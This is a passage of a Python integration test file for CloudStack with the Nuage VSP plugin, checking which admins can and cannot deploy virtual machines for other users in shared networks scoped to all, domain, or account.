except Exception as e:
self.debug(
"When a user from parent domain deploys a VM in a shared "
"network with scope=domain with no subdomain access %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when ROOT admin tries "
"to deploy a VM for parent domain user in a shared "
"network with scope=domain with no subdomain access")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_nosubdomaccess_parentdomadmin(
self):
"""Validate that ROOT admin is NOT able to deploy a VM for parent
domain admin user in a shared network with scope=domain with no
subdomain access
"""
# Deploy VM as an admin user in parentdomain of a domain that has
# shared network with no subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_d11.id,
accountid=self.account_d1.name,
domainid=self.account_d1.domainid
)
self.fail(
"ROOT admin is able to deploy a VM for parent domain admin "
"user in a shared network with scope=domain with no subdomain "
"access")
except Exception as e:
self.debug(
"When an admin user from parent domain deploys a VM in a "
"shared network with scope=domain with no subdomain access %s"
% e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for parent domain admin user in a shared "
"network with scope=domain with no subdomain access ")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_nosubdomaccess_ROOTuser(self):
"""Validate that ROOT admin is NOT able to deploy a VM for parent
domain admin user in a shared network with scope=domain with no
subdomain access
"""
# Deploy VM as user in ROOT domain
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmROOTA"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmROOTA"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_d11.id,
accountid=self.account_roota.name,
domainid=self.account_roota.domainid
)
self.fail(
"ROOT admin is able to deploy a VM for parent domain admin "
"user in a shared network with scope=domain with no subdomain "
"access")
except Exception as e:
self.debug(
"When a regular user from ROOT domain deploys a VM in a "
"shared network with scope=domain with no subdomain access %s"
% e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for parent domain admin user in a shared "
"network with scope=domain with no subdomain access")
# Test cases relating to deploying Virtual Machine as ROOT admin for other
# users in shared network with scope=Domain and with subdomain access
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_subdomaccess_domainuser(
self):
"""Validate that ROOT admin is able to deploy a VM for domain user in a
shared network with scope=domain with subdomain access
"""
# Deploy VM as user in a domain that has shared network with subdomain
# access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11A"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11A"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
testdata=self.vmdata, account=self.account_d11a,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11a.name and
vm.domainid == self.account_d11a.domainid,
True,
"ROOT admin is NOT able to deploy a VM for domain user in a "
"shared network with scope=domain with subdomain access")
self.verify_vsd_shared_network(
self.account_d11a.domainid,
self.shared_network_domain_with_subdomain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_with_subdomain_d11.id,
self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(
self.account_d11a.domainid,
self.shared_network_domain_with_subdomain_d11,
vm, sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_subdomaccess_domainadminuser(
self):
"""Validate that ROOT admin is able to deploy a VM for domain admin
user in a shared network with scope=domain with subdomain access
"""
# Deploy VM as an admin user in a domain that has shared network with
# subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
testdata=self.vmdata, account=self.account_d11,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11.name and
vm.domainid == self.account_d11.domainid,
True,
"ROOT admin is not able to deploy a VM for domain admin user in a "
"shared network with scope=domain with subdomain access")
self.verify_vsd_shared_network(
self.account_d11.domainid,
self.shared_network_domain_with_subdomain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_with_subdomain_d11.id,
self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(
self.account_d11.domainid,
self.shared_network_domain_with_subdomain_d11,
vm, sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_subdomaccess_subdomainuser(
self):
"""Validate that ROOT admin is able to deploy a VM for subdomain user
in a shared network with scope=domain with subdomain access
"""
# Deploy VM as user in a subdomain under a domain that has shared
# network with subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111A"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111A"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
testdata=self.vmdata, account=self.account_d111a,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d111a.name and
vm.domainid == self.account_d111a.domainid,
True,
"ROOT admin is not able to deploy a VM for subdomain user in a "
"shared network with scope=domain with subdomain access")
self.verify_vsd_shared_network(
self.account_d111a.domainid,
self.shared_network_domain_with_subdomain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_with_subdomain_d11.id,
self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(
self.account_d111a.domainid,
self.shared_network_domain_with_subdomain_d11,
vm, sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_subdomaccess_subdomainadmin(
self):
"""Validate that ROOT admin is able to deploy a VM for subdomain admin
user in a shared network with scope=domain with subdomain access
"""
# Deploy VM as an admin user in a subdomain under a domain that has
# shared network with subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
testdata=self.vmdata, account=self.account_d111,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d111.name and
vm.domainid == self.account_d111.domainid,
True,
"ROOT admin is not able to deploy VM for subdomain admin user in "
"a shared network with scope=domain subdomain access")
self.verify_vsd_shared_network(
self.account_d111.domainid,
self.shared_network_domain_with_subdomain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_with_subdomain_d11.id,
self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(
self.account_d111.domainid,
self.shared_network_domain_with_subdomain_d11,
vm, sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_subdomaccess_parentdomainuser(
self):
"""Validate that ROOT admin is NOT able to deploy a VM for parent
domain user in a shared network with scope=domain with subdomain access
"""
# Deploy VM as user in parentdomain of a domain that has shared network
# with subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1A"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1A"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_with_subdomain_d11.id,
accountid=self.account_d1a.name,
domainid=self.account_d1a.domainid
)
self.fail(
"ROOT admin is NOT able to deploy a VM for parent domain user "
"in a shared network with scope=domain with subdomain access")
except Exception as e:
self.debug(
"When a user from parent domain deploys a VM in a shared "
"network with scope=domain with subdomain access %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for parent domain user in a shared network "
"with scope=domain with subdomain access ")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_subdomaccess_parentdomainadmin(
self):
"""Validate that ROOT admin is NOT able to deploy a VM for parent
domain admin user in a shared network with scope=domain with subdomain
access
"""
# Deploy VM as an admin user in parentdomain of a domain that has
# shared network with subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_with_subdomain_d11.id,
accountid=self.account_d1.name,
domainid=self.account_d1.domainid
)
self.fail(
"ROOT admin is able to deploy VM for parent domain admin user "
"in a shared network with scope=domain subdomain access ")
except Exception as e:
self.debug(
"When an admin user from parent domain deploys a VM in a "
"shared network with scope=domain with subdomain access %s" %
e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for parent domain admin user in a shared "
"network with scope=domain with subdomain access ")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_subdomaccess_ROOTuser(self):
"""Validate that ROOT admin is NOT able to deploy a VM for user in ROOT
domain in a shared network with scope=domain with subdomain access
"""
# Deploy VM as user in ROOT domain
self.api_client.connection.apiKey = self.user_roota_apikey
self.api_client.connection.securityKey = self.user_roota_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmROOTA"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmROOTA"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_with_subdomain_d11.id,
accountid=self.account_roota.name,
domainid=self.account_roota.domainid
)
self.fail(
"ROOT admin is able to deploy a VM for user in ROOT domain in "
"a shared network with scope=domain with subdomain access")
except Exception as e:
self.debug(
"When a user from ROOT domain deploys a VM in a shared "
"network with scope=domain with subdomain access %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for user in ROOT domain in a shared network "
"with scope=domain with subdomain access")
# Test cases relating to deploying Virtual Machine as ROOT admin for other
# users in shared network with scope=account
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_scope_account_domainuser(self):
"""Validate that ROOT admin is NOT able to deploy a VM for user in the
same domain but in a different account in a shared network with
scope=account
"""
# Deploy VM as user in a domain under the same domain but different
# account from the account that has a shared network with scope=account
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111B"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111B"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_account_d111a.id,
accountid=self.account_d111b.name,
domainid=self.account_d111b.domainid
)
self.fail(
"ROOT admin is able to deploy VM for user in the same domain "
"but in different account in shared network scope=account")
except Exception as e:
self.debug(
"When a user from same domain but different account deploys a "
"VM in a shared network with scope=account %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.UNABLE_TO_USE_NETWORK):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for user in the same domain but in a "
"different account in a shared network with scope=account")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_scope_account_domainadminuser(
self):
"""Validate that ROOT admin is NOT able to deploy a VM for admin user
in the same domain but in a different account in a shared network with
scope=account
"""
# Deploy VM as admin user for a domain that has an account with shared
# network with scope=account
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_account_d111a.id,
accountid=self.account_d111.name,
domainid=self.account_d111.domainid
)
self.fail(
"ROOT admin is able to deploy VM for admin user in same "
"domain but in different account in shared network with "
"scope=account")
except Exception as e:
self.debug(
"When a user from same domain but different account deploys a "
"VM in a shared network with scope=account %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.UNABLE_TO_USE_NETWORK):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for admin user in the same domain but in a "
"different account in a shared network with scope=account")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_scope_account_user(self):
"""Validate that ROOT admin is able to deploy a VM for regular user in
a shared network with scope=account
"""
# Deploy VM as account with shared network with scope=account
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111A"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111A"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
vm = self.create_VM(self.shared_network_account_d111a,
testdata=self.vmdata, account=self.account_d111a,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d111a.name and
vm.domainid == self.account_d111a.domainid,
True,
"ROOT admin is not able to deploy a VM for regular user in a "
"shared network with scope=account")
self.verify_vsd_shared_network(self.account_d111a.domainid,
self.shared_network_account_d111a,
gateway=self.nuagenetworkdata[
"network_account"]["gateway"])
subnet_id = self.get_subnet_id(self.shared_network_account_d111a.id,
self.nuagenetworkdata[
"network_account"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d111a.domainid,
self.shared_network_account_d111a, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_scope_account_differentdomain(
self):
"""Validate that ROOT admin is NOT able to deploy a VM for a admin user
in a shared network with scope=account which the admin user does not
have access to
"""
# Deploy VM as an admin user in a subdomain under ROOT
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD2A"]["name"] + \
"-shared-scope-account-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD2A"]["displayname"] + \
"-shared-scope-account-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_account_d111a.id,
accountid=self.account_d2a.name,
domainid=self.account_d2a.domainid
)
self.fail(
"ROOT admin is able to deploy VM for admin user in shared "
"network scope=account which admin user does not have access")
except Exception as e:
self.debug("account %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.UNABLE_TO_USE_NETWORK):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for a admin user in a shared network with "
"scope=account which the admin user does not have access "
"to ")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_scope_account_ROOTuser(self):
"""Validate that ROOT admin is NOT able to deploy a VM for a user in
ROOT domain in a shared network with scope=account which the user does
not have access to
"""
# Deploy VM as user in ROOT domain
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmROOTA"]["name"] + \
"-shared-scope-account-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmROOTA"]["displayname"] + \
"-shared-scope-account-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_account_d111a.id,
accountid=self.account_roota.name,
domainid=self.account_roota.domainid
)
self.fail(
"ROOT admin is able to deploy VM for a user in ROOT domain in "
"shared network scope=account which user does not have access")
except Exception as e:
self.debug(
"When a user from ROOT domain deploys a VM in a shared "
"network with scope=account %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.UNABLE_TO_USE_NETWORK):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for a user in ROOT domain in a shared "
"network with scope=account which the user does not have "
"access to ")
# Test cases relating to deploying Virtual Machine as Domain admin for
# other users in shared network with scope=all
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_all_domainuser(
self):
"""Validate that Domain admin is able to deploy a VM for a domain user
in a shared network with scope=all
"""
# Deploy VM for a user in a domain under ROOT as admin
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1A"]["name"] + \
"-shared-scope-all-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1A"]["displayname"] + \
"-shared-scope-all-domain-admin"
vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
account=self.account_d1a, cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d1a.name and
vm.domainid == self.account_d1a.domainid,
True,
"Domain admin is not able to deploy a VM for a domain user in a "
"shared network with scope=all")
self.verify_vsd_shared_network(
self.account_d1a.domainid,
self.shared_network_all,
gateway=self.nuagenetworkdata["network_all"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_all.id,
self.nuagenetworkdata["network_all"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d1a.domainid,
self.shared_network_all, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_all_domadminuser(
self):
"""Validate that Domain admin is able to deploy a VM for a domain admin
user in a shared network with scope=all
"""
# Deploy VM for an admin user in a domain under ROOT as admin
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1"]["name"] + \
"-shared-scope-all-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1"]["displayname"] + \
"-shared-scope-all-domain-admin"
vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
account=self.account_d1, cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d1.name and
vm.domainid == self.account_d1.domainid,
True,
"Domain admin is not able to deploy a VM for a domain admin user "
"in a shared network with scope=all")
self.verify_vsd_shared_network(
self.account_d1.domainid,
self.shared_network_all,
gateway=self.nuagenetworkdata["network_all"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_all.id,
self.nuagenetworkdata["network_all"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d1.domainid,
self.shared_network_all, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_all_subdomainuser(
self):
"""Validate that Domain admin is able to deploy a VM for a sub domain
user in a shared network with scope=all
"""
# Deploy VM as user in a subdomain under ROOT
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11A"]["name"] + \
"-shared-scope-all-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11A"]["displayname"] + \
"-shared-scope-all-domain-admin"
vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
account=self.account_d11a, cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11a.name and
vm.domainid == self.account_d11a.domainid,
True,
"Domain admin is not able to deploy a VM for a sub domain user in "
"a shared network with scope=all")
self.verify_vsd_shared_network(
self.account_d11a.domainid,
self.shared_network_all,
gateway=self.nuagenetworkdata["network_all"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_all.id,
self.nuagenetworkdata["network_all"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d11a.domainid,
self.shared_network_all, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_all_subdomadmin(
self):
"""Validate that Domain admin is able to deploy a VM for a sub domain
admin user in a shared network with scope=all
"""
# Deploy VM as an admin user in a subdomain under ROOT
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11"]["name"] + \
"-shared-scope-all-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11"]["displayname"] + \
"-shared-scope-all-domain-admin"
vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
account=self.account_d11, cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11.name and
vm.domainid == self.account_d11.domainid,
True,
"Domain admin is not able to deploy a VM for a sub domain admin "
"user in a shared network with scope=all")
self.verify_vsd_shared_network(
self.account_d11.domainid,
self.shared_network_all,
gateway=self.nuagenetworkdata["network_all"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_all.id,
self.nuagenetworkdata["network_all"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d11.domainid,
self.shared_network_all, vm,
sharedsubnetid=subnet_id)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_all_ROOTuser(self):
"""Validate that Domain admin is NOT able to deploy a VM for user in
ROOT domain in a shared network with scope=all
"""
# Deploy VM as user in ROOT domain
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmROOTA"]["name"] + \
"-shared-scope-all"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmROOTA"]["displayname"] + \
"-shared-scope-all"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_all.id,
accountid=self.account_roota.name,
domainid=self.account_roota.domainid
)
self.fail(
"Domain admin is NOT able to deploy a VM for user in ROOT "
"domain in a shared network with scope=all")
except Exception as e:
self.debug(
"When a Domain admin user deploys a VM for ROOT user in a "
"shared network with scope=all %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NO_PERMISSION_TO_OPERATE_DOMAIN):
self.fail(
"Error message validation failed when Domain admin is NOT "
"able to deploy a VM for user in ROOT domain in a shared "
"network with scope=all")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_all_crossdomuser(
self):
"""Validate that Domain admin is NOT able to deploy a VM for user in
other domain in a shared network with scope=all
"""
# Deploy VM as user in ROOT domain
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmROOTA"]["name"] + "-shared-scope-all"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmROOTA"]["displayname"] + \
"-shared-scope-all"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_all.id,
accountid=self.account_d2a.name,
domainid=self.account_d2a.domainid
)
self.fail(
"Domain admin user is able to Deploy VM for a domain user he "
"does not have access to in a shared network with "
"scope=domain with no subdomain access ")
except Exception as e:
self.debug(
"When a Domain admin user deploys a VM for a domain user he "
"does not have access to in a shared network with "
"scope=domain with no subdomain access %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NO_PERMISSION_TO_OPERATE_DOMAIN):
self.fail(
"Error mesage validation failed when Domain admin user "
"tries to Deploy VM for a domain user he does not have "
"access to in a shared network with scope=domain with no "
"subdomain access ")
# Test cases relating to deploying Virtual Machine as Domain admin for
# other users in shared network with scope=Domain and no subdomain access
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_nosubdomaccess_domuser(
self):
"""Validate that Domain admin is able to deploy a VM for domain user in
a shared network with scope=Domain and no subdomain access
"""
# Deploy VM as user in a domain that has shared network with no
# subdomain access
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11A"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11A"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
vm = self.create_VM(self.shared_network_domain_d11,
testdata=self.vmdata, account=self.account_d11a,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11a.name and
vm.domainid == self.account_d11a.domainid,
True,
"Domain admin is not able to deploy a VM for domain user in a "
"shared network with scope=Domain and no subdomain access")
self.verify_vsd_shared_network(
self.account_d11a.domainid,
self.shared_network_domain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_no_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_d11.id,
self.nuagenetworkdata[
"network_domain_with_no_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d11a.domainid,
self.shared_network_domain_d11, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_nosubdomaccess_domadmin(
self):
"""Validate that Domain admin is able to deploy a VM for domain admin
user in a shared network with scope=Domain and no subdomain access
"""
# Deploy VM as an admin user in a domain that has shared network with
# no subdomain access
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
